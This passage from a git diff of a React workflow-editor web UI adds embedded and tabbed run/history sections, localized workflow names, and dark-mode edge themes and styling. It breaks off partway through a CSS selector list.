-      <span className="text-xs font-semibold text-gray-700 flex items-center gap-2">
+      <span className={`${embedded ? 'text-sm text-gray-900' : 'text-xs text-gray-700'} font-semibold flex items-center gap-2`}>
         {title}
         {badge}
       </span>
@@ -196,11 +208,15 @@ function TestSection({
   execution,
   onExecutionChange,
   onExecutionSettled,
+  embedded = false,
+  hideSectionHeader = false,
 }: {
   workflow: Workflow;
   execution: WorkflowExecution | null;
   onExecutionChange?: (execution: WorkflowExecution | null) => void;
   onExecutionSettled?: () => void;
+  embedded?: boolean;
+  hideSectionHeader?: boolean;
 }) {
   const { t } = useTranslation('workflow');
   const [expanded, setExpanded] = useState(true);
@@ -269,7 +285,7 @@ function TestSection({
 
     const pollExecution = async () => {
       try {
-        const response = await workflowAPI.getExecution(workflow.id, execution.id);
+        const response = await workflowAPI.getExecution(workflow.id, execution.id, { stepLimit: 0 });
         if (cancelled) return;
         onExecutionChange?.(response.data);
         if (response.data.status === 'running') {
@@ -400,12 +416,20 @@ function TestSection({
   };
 
   const showSampleSaveHint = sampleSaveState === 'saving' || sampleSaveState === 'saved';
+  const bodyExpanded = hideSectionHeader || expanded;
 
   return (
-    <div className="border-b border-gray-100">
-      <SectionHeader title={t('detail.run.testSection')} expanded={expanded} onToggle={() => setExpanded(v => !v)} />
-      {expanded && (
-        <div className="p-4 space-y-3">
+    <div className={embedded ? 'bg-white' : 'border-b border-gray-100'}>
+      {!hideSectionHeader && (
+        <SectionHeader
+          title={t('detail.run.testSection')}
+          expanded={expanded}
+          onToggle={() => setExpanded(v => !v)}
+          embedded={embedded}
+        />
+      )}
+      {bodyExpanded && (
+        <div className={`${embedded ? 'p-3' : 'p-4'} space-y-3`}>
           <div>
             <div className="flex items-center justify-between gap-2 mb-1">
               <label className="block text-xs text-gray-500">{t('detail.run.inputParams')}</label>
@@ -701,10 +725,14 @@ function HistorySection({
   workflowId,
   latestExecutionId,
   onLatestExecutionChange,
+  embedded = false,
+  hideSectionHeader = false,
 }: {
   workflowId: string;
   latestExecutionId?: string;
   onLatestExecutionChange?: (execution: WorkflowExecution | null) => void;
+  embedded?: boolean;
+  hideSectionHeader?: boolean;
 }) {
   const { t } = useTranslation('workflow');
   const [expanded, setExpanded] = useState(true);
@@ -731,7 +759,14 @@ function HistorySection({
       setSelectedExec(prev => {
         if (!prev) return null;
         const updated = res.data.find((e: WorkflowExecution) => e.id === prev.id);
-        return updated ?? prev;
+        if (!updated) return prev;
+        return {
+          ...updated,
+          executionLog: prev.executionLog?.length ? prev.executionLog : updated.executionLog,
+          stepLogOffset: prev.stepLogOffset ?? updated.stepLogOffset,
+          stepLogLimit: prev.stepLogLimit ?? updated.stepLogLimit,
+          stepLogTotal: prev.stepLogTotal ?? updated.stepLogTotal,
+        };
       });
     } catch {
       setHistory([]);
@@ -761,11 +796,33 @@ function HistorySection({
     if (status === 'error' || status === 'FAILED') return <XCircle className="w-3.5 h-3.5 text-red-500" />;
     return <AlertCircle className="w-3.5 h-3.5 text-orange-500" />;
   };
+  const bodyExpanded = hideSectionHeader || expanded;
+
+  const toggleExecutionDetail = async (exec: WorkflowExecution) => {
+    if (selectedExec?.id === exec.id) {
+      setSelectedExec(null);
+      return;
+    }
+    setSelectedExec(exec);
+    try {
+      const res = await workflowAPI.getExecution(workflowId, exec.id);
+      setSelectedExec(res.data);
+    } catch {
+      setSelectedExec(exec);
+    }
+  };
 
   return (
-    <div>
-      <SectionHeader title={t('detail.run.historySection')} expanded={expanded} onToggle={() => setExpanded(v => !v)} />
-      {expanded && (
+    <div className={embedded ? 'bg-white' : undefined}>
+      {!hideSectionHeader && (
+        <SectionHeader
+          title={t('detail.run.historySection')}
+          expanded={expanded}
+          onToggle={() => setExpanded(v => !v)}
+          embedded={embedded}
+        />
+      )}
+      {bodyExpanded && (
         <div>
           {loading ? (
             <div className="flex items-center justify-center py-6">
@@ -778,31 +835,32 @@ function HistorySection({
             </div>
           ) : (
             <div>
-              <div className="divide-y divide-gray-100">
+              <div>
                 {history.map((exec) => (
-                  <button
-                    key={exec.id}
-                    onClick={() => setSelectedExec(selectedExec?.id === exec.id ? null : exec)}
-                    className="w-full flex items-center gap-2 px-4 py-2.5 hover:bg-gray-50 transition-colors text-left"
-                  >
-                    {statusIcon(getExecutionDisplayStatus(exec))}
-                    <div className="flex-1 min-w-0">
-                      <p className="text-xs text-gray-700 truncate">{formatTime(exec.startedAt)}</p>
-                    </div>
-                    {exec.duration != null && (
-                      <span className="text-xs text-gray-400 flex-shrink-0">{exec.duration.toFixed(1)}s</span>
-                    )}
-                    {selectedExec?.id === exec.id ? (
-                      <ChevronDown className="w-3 h-3 text-gray-400 flex-shrink-0" />
-                    ) : (
-                      <ChevronRight className="w-3 h-3 text-gray-400 flex-shrink-0" />
+                  <div key={exec.id} className="border-b border-gray-100 last:border-b-0">
+                    <button
+                      onClick={() => void toggleExecutionDetail(exec)}
+                      className="w-full flex items-center gap-2 px-4 py-2.5 hover:bg-gray-50 transition-colors text-left"
+                    >
+                      {statusIcon(getExecutionDisplayStatus(exec))}
+                      <div className="flex-1 min-w-0">
+                        <p className="text-xs text-gray-700 truncate">{formatTime(exec.startedAt)}</p>
+                      </div>
+                      {exec.duration != null && (
+                        <span className="text-xs text-gray-400 flex-shrink-0">{exec.duration.toFixed(1)}s</span>
+                      )}
+                      {selectedExec?.id === exec.id ? (
+                        <ChevronDown className="w-3 h-3 text-gray-400 flex-shrink-0" />
+                      ) : (
+                        <ChevronRight className="w-3 h-3 text-gray-400 flex-shrink-0" />
+                      )}
+                    </button>
+                    {selectedExec?.id === exec.id && (
+                      <HistoryExecDetail exec={selectedExec} />
                     )}
-                  </button>
+                  </div>
                 ))}
               </div>
-              {selectedExec && (
-                <HistoryExecDetail exec={selectedExec} />
-              )}
             </div>
           )}
         </div>
@@ -819,20 +877,97 @@ export default function RunTab({
   latestExecution,
   onLatestExecutionChange,
   onExecutionSettled,
+  sections = ['test', 'history'],
+  embedded = false,
+  embeddedTabs = false,
+  hideSectionHeaders = false,
 }: RunTabProps) {
+  const { t } = useTranslation('workflow');
+  const [activeEmbeddedSection, setActiveEmbeddedSection] = useState<RunTabSection>('test');
+  const showTest = sections.includes('test');
+  const showHistory = sections.includes('history');
+  const activeSection =
+    activeEmbeddedSection === 'test' && showTest
+      ? 'test'
+      : activeEmbeddedSection === 'history' && showHistory
+        ? 'history'
+        : showTest
+          ? 'test'
+          : 'history';
+  const embeddedTabItems = [
+    showTest ? { id: 'test' as const, label: t('detail.run.testSection') } : null,
+    showHistory ? { id: 'history' as const, label: t('detail.run.historySection') } : null,
+  ].filter((item): item is { id: RunTabSection; label: string } => Boolean(item));
+
+  if (embeddedTabs) {
+    return (
+      <div className={embedded ? 'space-y-3' : 'flex-1 min-h-0 overflow-y-auto space-y-3'}>
+        <div className="flex rounded-md bg-gray-100 p-1">
+          {embeddedTabItems.map((item) => (
+            <button
+              key={item.id}
+              type="button"
+              onClick={() => setActiveEmbeddedSection(item.id)}
+              className={`flex-1 rounded px-2 py-1.5 text-xs font-medium transition-colors ${
+                activeSection === item.id
+                  ? 'bg-white text-red-600 shadow-sm'
+                  : 'text-gray-500 hover:text-gray-800'
+              }`}
+            >
+              {item.label}
+            </button>
+          ))}
+        </div>
+        <div className="overflow-hidden rounded-md border border-gray-200 bg-white">
+          {showTest && (
+            <div className={activeSection === 'test' ? 'block' : 'hidden'}>
+              <TestSection
+                workflow={workflow}
+                execution={latestExecution}
+                onExecutionChange={onLatestExecutionChange}
+                onExecutionSettled={onExecutionSettled}
+                embedded={embedded}
+                hideSectionHeader={hideSectionHeaders}
+              />
+            </div>
+          )}
+          {showHistory && (
+            <div className={activeSection === 'history' ? 'block' : 'hidden'}>
+              <HistorySection
+                workflowId={workflow.id}
+                latestExecutionId={latestExecution?.id}
+                onLatestExecutionChange={onLatestExecutionChange}
+                embedded={embedded}
+                hideSectionHeader={hideSectionHeaders}
+              />
+            </div>
+          )}
+        </div>
+      </div>
+    );
+  }
+
   return (
-    <div className="flex-1 min-h-0 overflow-y-auto divide-y divide-gray-100">
-      <TestSection
-        workflow={workflow}
-        execution={latestExecution}
-        onExecutionChange={onLatestExecutionChange}
-        onExecutionSettled={onExecutionSettled}
-      />
-      <HistorySection
-        workflowId={workflow.id}
-        latestExecutionId={latestExecution?.id}
-        onLatestExecutionChange={onLatestExecutionChange}
-      />
+    <div className={embedded ? 'space-y-3' : 'flex-1 min-h-0 overflow-y-auto divide-y divide-gray-100'}>
+      {showTest && (
+        <TestSection
+          workflow={workflow}
+          execution={latestExecution}
+          onExecutionChange={onLatestExecutionChange}
+          onExecutionSettled={onExecutionSettled}
+          embedded={embedded}
+          hideSectionHeader={hideSectionHeaders}
+        />
+      )}
+      {showHistory && (
+        <HistorySection
+          workflowId={workflow.id}
+          latestExecutionId={latestExecution?.id}
+          onLatestExecutionChange={onLatestExecutionChange}
+          embedded={embedded}
+          hideSectionHeader={hideSectionHeaders}
+        />
+      )}
     </div>
   );
 }
diff --git a/webui/src/pages/WorkflowEditor/components/PropertyPanel.tsx b/webui/src/pages/WorkflowEditor/components/PropertyPanel.tsx
index 21bee14f6..751e38b5c 100644
--- a/webui/src/pages/WorkflowEditor/components/PropertyPanel.tsx
+++ b/webui/src/pages/WorkflowEditor/components/PropertyPanel.tsx
@@ -3,6 +3,7 @@ import { X, Code2, FileText, Key, Settings, Wrench, Sparkles, Globe, Workflow as
 import { Node } from '@xyflow/react';
 import { useTranslation } from 'react-i18next';
 import { workflowAPI, Workflow } from '@/api/workflow';
+import { getWorkflowDisplayName } from '@/utils/workflowDisplay';
 
 interface PropertyPanelProps {
   selectedNode: Node | null;
@@ -74,7 +75,7 @@ export default function PropertyPanel({
   onClose,
   onUpdate,
 }: PropertyPanelProps) {
-  const { t } = useTranslation('workflow');
+  const { t, i18n } = useTranslation('workflow');
   const nodeTypeLabels: Record<string, string> = {
     python: t('editor.nodeTypes.python'),
     logic: t('editor.nodeTypes.logic'),
@@ -426,7 +427,7 @@ export default function PropertyPanel({
                 <option value="">{t('editor.selectWorkflow')}</option>
                 {availableWorkflows.map((wf) => (
                   <option key={wf.id} value={wf.id}>
-                    {wf.name}
+                    {getWorkflowDisplayName(wf, i18n.language)}
                   </option>
                 ))}
               </select>
diff --git a/webui/src/pages/WorkflowEditor/index.tsx b/webui/src/pages/WorkflowEditor/index.tsx
index d82682280..536e15a35 100644
--- a/webui/src/pages/WorkflowEditor/index.tsx
+++ b/webui/src/pages/WorkflowEditor/index.tsx
@@ -1,4 +1,4 @@
-import React, { useState, useCallback, useEffect } from 'react';
+import React, { useState, useCallback, useContext, useEffect, useMemo } from 'react';
 import { useTranslation } from 'react-i18next';
 import { useParams, useNavigate } from 'react-router-dom';
 import {
@@ -32,6 +32,7 @@ import {
   Trash2,
 } from 'lucide-react';
 import { workflowAPI, Workflow, WorkflowExecution, WorkflowJSON, WorkflowNode as APINode } from '@/api/workflow';
+import { ThemeContext } from '@/contexts/ThemeContext';
 import { extractErrorMessage } from '@/utils/error';
 import {
   buildWorkflowGraphLayout,
@@ -39,6 +40,7 @@ import {
   type WorkflowGraphEdgeRoute,
   type WorkflowGraphOutputHandle,
 } from '@/utils/workflowGraphLayout';
+import { getWorkflowDisplayName } from '@/utils/workflowDisplay';
 
 // 自定义节点组件
 import PythonNode from './nodes/PythonNode';
@@ -91,13 +93,15 @@ const nodeMiniMapColors: Record<string, string> = {
   subworkflow: '#fb923c',
 };
 
-const edgeTheme: Record<WorkflowGraphEdgeRoute['kind'], {
+type EdgeTheme = Record<WorkflowGraphEdgeRoute['kind'], {
   stroke: string;
   label: string;
   labelBg: string;
   strokeWidth: number;
   strokeDasharray?: string;
-}> = {
+}>;
+
+const LIGHT_EDGE_THEME: EdgeTheme = {
   default: {
     stroke: '#94a3b8',
     label: '#64748b',
@@ -125,10 +129,39 @@ const edgeTheme: Record<WorkflowGraphEdgeRoute['kind'], {
   },
 };
 
+const DARK_EDGE_THEME: EdgeTheme = {
+  default: {
+    stroke: '#5a6573',
+    label: '#b8c2cc',
+    labelBg: '#303842',
+    strokeWidth: 1.8,
+  },
+  branch: {
+    stroke: '#f59e0b',
+    label: '#fbbf24',
+    labelBg: '#3d3424',
+    strokeWidth: 2.2,
+  },
+  loop: {
+    stroke: '#a78bfa',
+    label: '#c4b5fd',
+    labelBg: '#363047',
+    strokeWidth: 2,
+  },
+  back: {
+    stroke: '#5a6573',
+    label: '#b8c2cc',
+    labelBg: '#303842',
+    strokeWidth: 1.8,
+    strokeDasharray: '6 5',
+  },
+};
+
 function buildReactFlowEdge(
   edge: WorkflowJSON['edges'][number],
   index: number,
-  route: WorkflowGraphEdgeRoute = { kind: 'default' }
+  route: WorkflowGraphEdgeRoute = { kind: 'default' },
+  edgeTheme: EdgeTheme = LIGHT_EDGE_THEME
 ): Edge {
   const theme = edgeTheme[route.kind];
 
@@ -165,7 +198,7 @@ function buildReactFlowEdge(
 }
 
 // 将后端数据转换为 ReactFlow 格式
-function convertToReactFlowFormat(workflowJson: WorkflowJSON): { nodes: Node[]; edges: Edge[] } {
+function convertToReactFlowFormat(workflowJson: WorkflowJSON, edgeTheme: EdgeTheme = LIGHT_EDGE_THEME): { nodes: Node[]; edges: Edge[] } {
   const diagram = buildWorkflowGraphLayout(workflowJson);
   const nodes: Node[] = workflowJson.nodes.map((node) => ({
     id: node.id,
@@ -203,7 +236,7 @@ function convertToReactFlowFormat(workflowJson: WorkflowJSON): { nodes: Node[];
   }));
 
   const edges: Edge[] = workflowJson.edges.map((edge, index) =>
-    buildReactFlowEdge(edge, index, diagram.edgeRoutes[workflowGraphEdgeId(edge, index)])
+    buildReactFlowEdge(edge, index, diagram.edgeRoutes[workflowGraphEdgeId(edge, index)], edgeTheme)
   );
 
   return { nodes, edges };
@@ -250,7 +283,7 @@ interface EdgeData {
   const?: Record<string, any>;
 }
 
-function applyGraphSemantics(nodes: Node[], edges: Edge[], workflow: Workflow): { nodes: Node[]; edges: Edge[] } {
+function applyGraphSemantics(nodes: Node[], edges: Edge[], workflow: Workflow, edgeTheme: EdgeTheme = LIGHT_EDGE_THEME): { nodes: Node[]; edges: Edge[] } {
   const workflowJson = convertToWorkflowJSON(nodes, edges, workflow);
   const diagram = buildWorkflowGraphLayout(workflowJson);
   const updatedNodes = nodes.map((node) => ({
@@ -261,7 +294,7 @@ function applyGraphSemantics(nodes: Node[], edges: Edge[], workflow: Workflow):
     },
   }));
   const updatedEdges = workflowJson.edges.map((edge, index) =>
-    buildReactFlowEdge(edge, index, diagram.edgeRoutes[workflowGraphEdgeId(edge, index)])
+    buildReactFlowEdge(edge, index, diagram.edgeRoutes[workflowGraphEdgeId(edge, index)], edgeTheme)
   );
 
   return { nodes: updatedNodes, edges: updatedEdges };
@@ -325,9 +358,12 @@ function convertToWorkflowJSON(nodes: Node[], edges: Edge[], workflow: Workflow)
 }
 
 export default function WorkflowEditor() {
-  const { t } = useTranslation('workflow');
+  const { t, i18n } = useTranslation('workflow');
+  const { theme } = useContext(ThemeContext);
   const { id } = useParams<{ id: string }>();
   const navigate = useNavigate();
+  const isDark = theme === 'dark';
+  const edgeTheme = useMemo(() => (isDark ? DARK_EDGE_THEME : LIGHT_EDGE_THEME), [isDark]);
 
   const [workflow, setWorkflow] = useState<Workflow | null>(null);
   const [nodes, setNodes, onNodesChange] = useNodesState<Node>([]);
@@ -358,6 +394,13 @@ export default function WorkflowEditor() {
     }
   }, [currentExecution]);
 
+  useEffect(() => {
+    if (!workflow) return;
+    const refreshed = applyGraphSemantics(nodes, edges, workflow, edgeTheme);
+    setNodes(refreshed.nodes);
+    setEdges(refreshed.edges);
+  }, [edgeTheme]);
+
   useEffect(() => {
     if (!id || !showExecutionPanel || !currentExecution?.id || currentExecution.status !== 'running') {
       return;
@@ -396,7 +439,7 @@ export default function WorkflowEditor() {
       const response = await workflowAPI.get(id!);
       setWorkflow(response.data);
       
-      const { nodes: flowNodes, edges: flowEdges } = convertToReactFlowFormat(response.data.workflowJson);
+      const { nodes: flowNodes, edges: flowEdges } = convertToReactFlowFormat(response.data.workflowJson, edgeTheme);
       setNodes(flowNodes);
       setEdges(flowEdges);
     } catch (error: any) {
@@ -451,13 +494,13 @@ export default function WorkflowEditor() {
           );
 
           if (!workflow) return nextEdges;
-          const refreshed = applyGraphSemantics(nodes, nextEdges, workflow);
+          const refreshed = applyGraphSemantics(nodes, nextEdges, workflow, edgeTheme);
           setNodes(refreshed.nodes);
           return refreshed.edges;
         }
       );
     },
-    [nodes, setEdges, setNodes, workflow]
+    [edgeTheme, nodes, setEdges, setNodes, workflow]
   );
 
   // 节点点击事件 - 显示属性面板
@@ -480,11 +523,11 @@ export default function WorkflowEditor() {
       const nextEdges = applyEdgeChanges(changes, eds);
       if (!workflow) return nextEdges;
 
-      const refreshed = applyGraphSemantics(nodes, nextEdges, workflow);
+      const refreshed = applyGraphSemantics(nodes, nextEdges, workflow, edgeTheme);
       setNodes(refreshed.nodes);
       return refreshed.edges;
     });
-  }, [nodes, setEdges, setNodes, workflow]);
+  }, [edgeTheme, nodes, setEdges, setNodes, workflow]);
 
   // 添加新节点
   const handleAddNode = useCallback((type: string) => {
@@ -546,13 +589,13 @@ export default function WorkflowEditor() {
       });
 
       if (!workflow) return updatedEdges;
-      const refreshed = applyGraphSemantics(nodes, updatedEdges, workflow);
+      const refreshed = applyGraphSemantics(nodes, updatedEdges, workflow, edgeTheme);
       setNodes(refreshed.nodes);
       return refreshed.edges;
     });
     setShowEdgePropertyPanel(false);
     setSelectedEdge(null);
-  }, [nodes, setEdges, setNodes, workflow]);
+  }, [edgeTheme, nodes, setEdges, setNodes, workflow]);
 
   // 删除选中的节点或边（键盘事件）
   useEffect(() => {
@@ -573,7 +616,7 @@ export default function WorkflowEditor() {
             const nextEdges = eds.filter((edge) => !edge.selected);
             if (!workflow) return nextEdges;
 
-            const refreshed = applyGraphSemantics(nodes, nextEdges, workflow);
+            const refreshed = applyGraphSemantics(nodes, nextEdges, workflow, edgeTheme);
             setNodes(refreshed.nodes);
             return refreshed.edges;
           });
@@ -595,7 +638,7 @@ export default function WorkflowEditor() {
     return () => {
       document.removeEventListener('keydown', handleKeyDown);
     };
-  }, [nodes, edges, setNodes, setEdges, workflow]);
+  }, [edgeTheme, nodes, edges, setNodes, setEdges, workflow]);
 
   // 自动布局
   const handleAutoLayout = () => {
@@ -613,7 +656,7 @@ export default function WorkflowEditor() {
     }));
 
     const updatedEdges = workflowJson.edges.map((edge, index) =>
-      buildReactFlowEdge(edge, index, diagram.edgeRoutes[workflowGraphEdgeId(edge, index)])
+      buildReactFlowEdge(edge, index, diagram.edgeRoutes[workflowGraphEdgeId(edge, index)], edgeTheme)
     );
 
     setNodes(updatedNodes);
@@ -759,19 +802,19 @@ export default function WorkflowEditor() {
   }
 
   return (
-    <div className="h-screen flex flex-col bg-gray-50">
+    <div className="h-screen flex flex-col bg-gray-50 dark:bg-zinc-950">
       {/* 顶部工具栏 */}
-      <div className="bg-white border-b border-gray-200 px-6 py-4 flex items-center justify-between">
+      <div className="bg-white border-b border-gray-200 px-6 py-4 flex items-center justify-between dark:border-zinc-800 dark:bg-zinc-950">
         <div className="flex items-center gap-4">
           <button
             onClick={() => navigate('/workflows')}
-            className="p-2 hover:bg-gray-100 rounded-lg transition-colors"
+            className="p-2 hover:bg-gray-100 rounded-lg transition-colors dark:text-zinc-300 dark:hover:bg-zinc-800"
           >
             <ArrowLeft className="w-5 h-5" />
           </button>
           <div>
-            <h1 className="text-xl font-semibold text-gray-900">{workflow.name}</h1>
-            <p className="text-sm text-gray-500">{workflow.description || t('editor.noDescription')}</p>
+            <h1 className="text-xl font-semibold text-gray-900 dark:text-zinc-100">{getWorkflowDisplayName(workflow, i18n.language)}</h1>
+            <p className="text-sm text-gray-500 dark:text-zinc-400">{workflow.description || t('editor.noDescription')}</p>
           </div>
           {validationResult && (
             <div className="flex items-center gap-2">
@@ -791,7 +834,7 @@ export default function WorkflowEditor() {
           <button
             onClick={() => setShowNodeToolbar(!showNodeToolbar)}
             className={`flex items-center gap-2 px-4 py-2 border border-gray-300 rounded-lg transition-colors ${
-              showNodeToolbar ? 'bg-red-50 text-red-700 border-red-500' : 'text-gray-700 bg-white hover:bg-gray-50'
+              showNodeToolbar ? 'bg-red-50 text-red-700 border-red-500 dark:bg-red-950/30 dark:text-red-200 dark:border-red-500/40' : 'text-gray-700 bg-white hover:bg-gray-50 dark:border-zinc-700 dark:bg-zinc-900 dark:text-zinc-200 dark:hover:bg-zinc-800'
             }`}
           >
             <Trash2 className="w-4 h-4" />
@@ -799,21 +842,21 @@ export default function WorkflowEditor() {
           </button>
           <button
             onClick={handleAutoLayout}
-            className="flex items-center gap-2 px-4 py-2 text-gray-700 bg-white border border-gray-300 rounded-lg hover:bg-gray-50 transition-colors"
+            className="flex items-center gap-2 px-4 py-2 text-gray-700 bg-white border border-gray-300 rounded-lg hover:bg-gray-50 transition-colors dark:border-zinc-700 dark:bg-zinc-900 dark:text-zinc-200 dark:hover:bg-zinc-800"
           >
             <Layout className="w-4 h-4" />
             {t('editor.autoLayout')}
           </button>
           <button
             onClick={handleValidate}
-            className="flex items-center gap-2 px-4 py-2 text-gray-700 bg-white border border-gray-300 rounded-lg hover:bg-gray-50 transition-colors"
+            className="flex items-center gap-2 px-4 py-2 text-gray-700 bg-white border border-gray-300 rounded-lg hover:bg-gray-50 transition-colors dark:border-zinc-700 dark:bg-zinc-900 dark:text-zinc-200 dark:hover:bg-zinc-800"
           >
             <CheckCircle className="w-4 h-4" />
             {t('editor.validate')}
           </button>
           <button
             onClick={handleExport}
-            className="flex items-center gap-2 px-4 py-2 text-gray-700 bg-white border border-gray-300 rounded-lg hover:bg-gray-50 transition-colors"
+            className="flex items-center gap-2 px-4 py-2 text-gray-700 bg-white border border-gray-300 rounded-lg hover:bg-gray-50 transition-colors dark:border-zinc-700 dark:bg-zinc-900 dark:text-zinc-200 dark:hover:bg-zinc-800"
           >
             <FileJson className="w-4 h-4" />
             {t('editor.export')}
@@ -906,32 +949,33 @@ export default function WorkflowEditor() {
           attributionPosition="bottom-left"
           deleteKeyCode={null}
         >
-          <Background variant={BackgroundVariant.Dots} gap={12} size={1} />
+          <Background variant={BackgroundVariant.Dots} gap={12} size={1} color={isDark ? '#5a6573' : '#e2e8f0'} />
           <Controls />
           <MiniMap
             nodeColor={(node) => {
               return nodeMiniMapColors[node.type as keyof typeof nodeMiniMapColors] ?? '#94a3b8';
             }}
-            style={{ backgroundColor: '#f9fafb' }}
+            maskColor={isDark ? 'rgba(34, 39, 46, 0.72)' : 'rgba(241, 245, 249, 0.68)'}
+            style={{ backgroundColor: isDark ? '#303842' : '#f9fafb' }}
           />
           
           {/* 图例 */}
-          <Panel position="top-left" className="bg-white rounded-lg shadow-lg p-4">
-            <h3 className="text-sm font-semibold text-gray-900 mb-3">{t('editor.nodeTypesLabel')}</h3>
+          <Panel position="top-left" className="bg-white rounded-lg shadow-lg p-4 dark:border dark:border-zinc-800 dark:bg-zinc-900 dark:shadow-xl dark:shadow-black/30">
+            <h3 className="text-sm font-semibold text-gray-900 mb-3 dark:text-zinc-100">{t('editor.nodeTypesLabel')}</h3>
             <div className="space-y-2">
               {Object.entries(nodeColors).map(([type, colors]) => (
                 <div key={type} className="flex items-center gap-2">
                   <div className={`w-4 h-4 rounded border-2 ${colors.border} ${colors.bg}`} />
-                  <span className="text-xs text-gray-700 capitalize">{type}</span>
+                  <span className="text-xs text-gray-700 capitalize dark:text-zinc-300">{type}</span>
                 </div>
               ))}
             </div>
           </Panel>
 
           {/* 统计信息 */}
-          <Panel position="top-right" className="bg-white rounded-lg shadow-lg p-4">
-            <h3 className="text-sm font-semibold text-gray-900 mb-3">{t('editor.statsLabel')}</h3>
-            <div className="space-y-2 text-xs text-gray-600">
+          <Panel position="top-right" className="bg-white rounded-lg shadow-lg p-4 dark:border dark:border-zinc-800 dark:bg-zinc-900 dark:shadow-xl dark:shadow-black/30">
+            <h3 className="text-sm font-semibold text-gray-900 mb-3 dark:text-zinc-100">{t('editor.statsLabel')}</h3>
+            <div className="space-y-2 text-xs text-gray-600 dark:text-zinc-300">
               <div className="flex justify-between gap-4">
                 <span>{t('editor.nodeCountLabel')}</span>
                 <span className="font-medium">{nodes.length}</span>
diff --git a/webui/src/pages/Workspace/index.tsx b/webui/src/pages/Workspace/index.tsx
index 7f20a6652..9d3621e80 100644
--- a/webui/src/pages/Workspace/index.tsx
+++ b/webui/src/pages/Workspace/index.tsx
@@ -373,12 +373,12 @@ function FilesTab() {
             </div>
           ) : (
             <table className="w-full text-sm">
-              <thead className="bg-gray-50 sticky top-0">
+              <thead className="sticky top-0 bg-gray-50 dark:bg-zinc-900/95">
                 <tr>
-                  <th className="text-left px-4 py-2 text-xs font-medium text-gray-500 w-8"></th>
-                  <th className="text-left px-2 py-2 text-xs font-medium text-gray-500">{t('files.columns.name')}</th>
-                  <th className="text-right px-4 py-2 text-xs font-medium text-gray-500 w-24">{t('files.columns.size')}</th>
-                  <th className="text-right px-4 py-2 text-xs font-medium text-gray-500 w-36">{t('files.columns.modified')}</th>
+                  <th className="w-8 px-4 py-2 text-left text-xs font-medium text-gray-500 dark:text-zinc-500"></th>
+                  <th className="px-2 py-2 text-left text-xs font-medium text-gray-500 dark:text-zinc-500">{t('files.columns.name')}</th>
+                  <th className="w-24 px-4 py-2 text-right text-xs font-medium text-gray-500 dark:text-zinc-500">{t('files.columns.size')}</th>
+                  <th className="w-36 px-4 py-2 text-right text-xs font-medium text-gray-500 dark:text-zinc-500">{t('files.columns.modified')}</th>
                   <th className="w-20"></th>
                 </tr>
               </thead>
@@ -388,17 +388,19 @@ function FilesTab() {
                     key={item.path}
                     onClick={() => handleSelectNode(item)}
                     className={`group border-t border-gray-50 cursor-pointer transition-colors ${
-                      panel.node?.path === item.path ? 'bg-slate-100' : 'hover:bg-gray-50'
+                      panel.node?.path === item.path
+                        ? 'bg-slate-100 dark:bg-zinc-800/70'
+                        : 'hover:bg-gray-50 dark:hover:bg-zinc-900/70'
                     }`}
                   >
                     <td className="px-4 py-2 text-sm">{fileIcon(item)}</td>
-                    <td className="px-2 py-2 font-medium text-gray-800 truncate max-w-0">
+                    <td className="max-w-0 truncate px-2 py-2 font-medium text-gray-800 dark:text-zinc-100">
                       <span className="block truncate">{item.name}</span>
                     </td>
-                    <td className="px-4 py-2 text-right text-gray-400 tabular-nums whitespace-nowrap">
+                    <td className="whitespace-nowrap px-4 py-2 text-right tabular-nums text-gray-400 dark:text-zinc-500">
                       {item.type === 'file' ? formatBytes(item.size ?? 0) : '—'}
                     </td>
-                    <td className="px-4 py-2 text-right text-gray-400 text-xs whitespace-nowrap">
+                    <td className="whitespace-nowrap px-4 py-2 text-right text-xs text-gray-400 dark:text-zinc-500">
                       {formatDate(item.modified_at)}
                     </td>
                     <td className="px-2 py-2">
diff --git a/webui/src/routes/index.tsx b/webui/src/routes/index.tsx
index 5414e8016..d3538d4a4 100644
--- a/webui/src/routes/index.tsx
+++ b/webui/src/routes/index.tsx
@@ -65,15 +65,15 @@ export function Routes() {
   if (error) {
     return (
       <AuthLayout>
-        <div className="w-full max-w-lg bg-white border border-gray-200 rounded-xl p-6 shadow-sm space-y-4">
+        <div className="w-full max-w-lg bg-white border border-gray-200 rounded-xl p-6 shadow-sm space-y-4 dark:border-[#4a5563] dark:bg-[#303842] dark:shadow-xl dark:shadow-black/20">
           <div>
-            <h1 className="text-xl font-semibold text-gray-900">{t('error.systemUnknownTitle')}</h1>
-            <p className="text-sm text-gray-500 mt-1">{error}</p>
+            <h1 className="text-xl font-semibold text-gray-900 dark:text-[#d7dee8]">{t('error.systemUnknownTitle')}</h1>
+            <p className="text-sm text-gray-500 mt-1 dark:text-[#b8c2cc]">{error}</p>
           </div>
           <button
             type="button"
             onClick={() => void refresh()}
-            className="bg-slate-900 text-white rounded-lg px-4 py-2 font-medium hover:bg-slate-800"
+            className="bg-slate-900 text-white rounded-lg px-4 py-2 font-medium hover:bg-slate-800 dark:bg-[#46515e] dark:hover:bg-[#5a6573]"
           >
             {t('error.retry')}
           </button>
diff --git a/webui/src/styles/index.css b/webui/src/styles/index.css
index bbb57fd89..00366a553 100644
--- a/webui/src/styles/index.css
+++ b/webui/src/styles/index.css
@@ -4,7 +4,7 @@
 
 @layer base {
   body {
-    @apply bg-gray-50 text-gray-900;
+    @apply bg-gray-50 text-gray-900 dark:bg-zinc-950 dark:text-zinc-100;
   }
 }
 
@@ -192,3 +192,1345 @@
     @apply border-white/20;
   }
 }
+
+/* VS Code / GitHub Dark Dimmed inspired compatibility for existing Tailwind utilities. */
+.dark {
+  --flocks-dark-accent: #539bf5;
+  --flocks-dark-app: #252c35;
+  --flocks-dark-surface: #303842;
+  --flocks-dark-surface-soft: #3a434e;
+  --flocks-dark-surface-raised: #46515e;
+  --flocks-dark-border: #4a5563;
+  --flocks-dark-border-strong: #5a6573;
+  --flocks-dark-text: #d7dee8;
+  --flocks-dark-text-muted: #b8c2cc;
+  --flocks-dark-text-subtle: #9aa7b4;
+  --flocks-dark-placeholder: rgb(184 194 204 / 0.78);
+  --flocks-dark-shadow: 0 18px 48px rgb(28 33 40 / 0.38);
+  background-color: var(--flocks-dark-app);
+  color: var(--flocks-dark-text);
+}
+
+.dark body,
+.dark #root {
+  background-color: var(--flocks-dark-app);
+  color: var(--flocks-dark-text);
+}
+
+.dark ::selection {
+  background-color: rgb(83 155 245 / 0.32);
+  color: #ffffff;
+}
+
+.dark .bg-white,
+.dark .bg-white\/95,
+.dark .bg-white\/90,
+.dark .bg-white\/80,
+.dark .bg-white\/70,
+.dark .bg-white\/60,
+.dark .bg-white\/50,
